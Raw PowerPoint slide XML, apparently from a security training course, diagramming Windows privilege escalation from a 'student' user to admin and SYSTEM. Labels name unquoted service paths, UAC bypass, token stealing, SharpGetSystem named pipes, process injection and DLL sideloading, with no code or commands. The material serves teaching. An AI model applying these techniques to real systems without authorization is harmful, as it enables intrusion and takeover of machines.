        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8046728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F2324DE-41A3-CA8E-6D79-8D7DB26D44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791" y="617575"/>
            <a:ext cx="6502400" cy="54102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044D718-6F4B-04AB-DFEB-B662D421C40C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5252484" y="1516912"/>
            <a:ext cx="3530009" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernel32.dll</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kernelbase.dll</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ntdll.dll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yscall (transition user/kernel mode)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24298613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86CF9-1E0F-CF73-12F9-21AF6EAEDB7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4371B45-721C-23E8-F31C-F5E99FE4DECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="1396203"/>
            <a:ext cx="3207616" cy="677108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Unprivileged user (student)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Limited Access Token</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0130E41-D48E-8F78-2BD3-6D5E88336911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="1757152"/>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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73871591-E1AA-800C-1ED6-287644F88677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="2444942"/>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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B927685F-CD44-B6BE-30B9-3E089F545636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="2889121"/>
            <a:ext cx="1065387" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="800" b="1"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>edium integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74B513B-E457-25F8-79EE-235B40A8696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0AF8891E-990F-DFA0-6BB6-808691ED6C35}"/>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35F01DCF-3092-B135-2045-91FFF63943DD}"/>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28729117-742F-AAB8-BDB8-466001D70932}"/>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16" name="Curved Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452B19FD-6161-D937-15D3-821098DD067C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4410672" y="1734757"/>
            <a:ext cx="12700" cy="2005970"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6054551"/>
              <a:gd name="adj2" fmla="val 10892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Curved Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75894046-DBF0-5F26-F8F1-F0162FE909BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7162208" y="3316042"/>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Curved Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA504007-E6AF-F205-4823-2C2342A6E067}"/>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1BECB30-0663-DF88-108D-DB1837805E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1391628"/>
            <a:ext cx="3343031" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Misconfiguration/Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>eak permissions, dll sideloading/hijacking …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C08F20F-97E4-EB09-7808-0D78C1F9D08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995844" y="4208367"/>
            <a:ext cx="3144900" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Abuse Privileges ( Steal token)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48368BD5-8763-4833-8227-3BB36375C453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904644" y="2016998"/>
            <a:ext cx="1806500" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>UNQUOTED SERVICE PATH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads to admin in HIGH integrity if service running with admin privs</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60C6EB3B-F02E-E3C8-1A54-E50F077AF233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062289" y="3319867"/>
            <a:ext cx="1806499" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>UAC BYPASS </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads to SYSTEM in HIGH Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B136FD51-806A-B3B6-2CDA-584DE3FA5E88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062290" y="4777754"/>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C027FD9B-EADE-4211-76A9-CDC6EC7F83E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062290" y="5186881"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDCA06C4-8E2A-9418-7C1C-2DBDB940EEF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974856" y="3238676"/>
            <a:ext cx="11116853" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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A74ABC0E-9673-C4EB-6F91-789AB3A8728E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8062290" y="5617413"/>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
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DB60B4-ECD9-FA2D-C952-C7661617BB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7995844" y="2889121"/>
            <a:ext cx="1395575" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>UAC Bypass</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14878244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75B00-CB55-2A02-51AF-E9F18331B0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A7EE6E-6A99-0F2A-20DB-C5FB4BAD237B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Privilege escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD585902-7961-2B82-F442-2E9BAF7C8A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="3548744"/>
            <a:ext cx="3207616" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>Admin user (student_adm)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB85AFE1-3052-D193-15BA-07DD71D8DD0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="3992923"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A31524-F2ED-F58F-4746-4B4F18376939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4492192" y="4533041"/>
            <a:ext cx="3207616" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>System user (NT AUTHORITY)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-BE" sz="1400"/>
            </a:br>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651610C3-A539-19FB-E448-44C267E7336D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6537854" y="4977220"/>
            <a:ext cx="1065387" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Curved Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7FCD44B-7BF9-2F84-95D4-C82FA542F1EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7162207" y="4389733"/>
            <a:ext cx="614965" cy="460235"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19971"/>
              <a:gd name="adj2" fmla="val 149670"/>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4DEA4DE2-0E4D-8A68-41A3-D3989478034F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239571" y="1241503"/>
            <a:ext cx="2077235" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Abuse Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Stealing Access Tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>GetSystem (named pipes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Process Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB61070-8C68-365E-A69F-54CEDAB6F7FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8107632" y="3766809"/>
            <a:ext cx="1806499" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>TOKEN STEALING</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads to SYSTEM in HIGH Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C46DE6D-7E24-DEB9-09FF-3427CDD1CDA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8107632" y="4175936"/>
            <a:ext cx="1806499" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>SHARPGETSYSTEM (named pipes)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads to SYSTEM in HIGH Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5932BA5-0B9F-7A3C-6451-95165A735DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8107632" y="4606468"/>
            <a:ext cx="1806499" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>PROCESS INJECTION</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads to SYSTEM in HIGH Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
